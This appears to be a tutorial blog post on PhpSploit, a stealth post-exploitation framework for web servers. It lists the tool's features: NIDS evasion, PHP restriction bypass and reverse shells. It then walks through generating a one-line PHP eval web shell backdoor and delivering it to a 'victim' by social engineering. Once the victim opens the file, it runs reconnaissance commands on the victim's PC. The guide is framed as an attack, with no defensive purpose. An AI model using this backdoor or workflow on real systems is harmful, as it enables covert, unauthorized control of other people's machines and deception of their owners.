PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
Efficient: More than 20 plugins to automate post-exploitation tasks
- Run commands and browse filesystem, bypassing PHP security restrictions
- Upload/Download files between client and target
- Edit remote files through local text editor
- Run SQL console on target system
- Spawn reverse TCP shells
Stealth: The framework is made by paranoids, for paranoids
- Nearly invisible by log analysis and NIDS signature detection
- Safe-mode and common PHP security restrictions bypass
- Communications are hidden in HTTP Headers
- Loaded payloads are obfuscated to bypass NIDS
- http/https/socks4/socks5 Proxy support
Convenient: A robust interface with many crucial features
- Cross-platformon both the client and the server.
- Powerful interface with completion and multi-command support
- Session saving/loading feature, with persistent history
- Multi-request support for large payloads (such as uploads)
- Provides a powerful, highly configurable settings engine
- Each setting, such as user-agent has a polymorphic mode
- Customisable environment variables for plugin interaction
- Provides a complete plugin development API
Open your kali Linux terminal and type the following command
open terminal and type ./phpsploit
Now you’ll get a prompt, type set target 192.168.1.3 and press enter
Now type exploit
It’ll create the backdoor with the message Current backdoor is: <?php @eval($_SERVER[ ‘HTTP_PHPSPLOIT’]); ?>
See the example below:
Now open leafpad/notepad and paste the above code and save it in .php extension
Now send this backdoor file to the victim using any social engineering technique. In my case I’m using Xampp and paste it in htdocs folder and wait for the victim to click on the .php file.
Now you can view the backdoor image
Now type set target http://192.168.1.3/script/script.php (location of file in victim’s PC)
Now you can connect with the target PC.
Now type whoami command, it will show you the user details and type pwd command to check the location of your backdoor file in target PC.
Now type run ipconfig command to check IP configuration of victim’s PC.
Now type run systeminfo command to check system information of victim’s PC.
(Now you get complete access of victim’s PC and can run any command)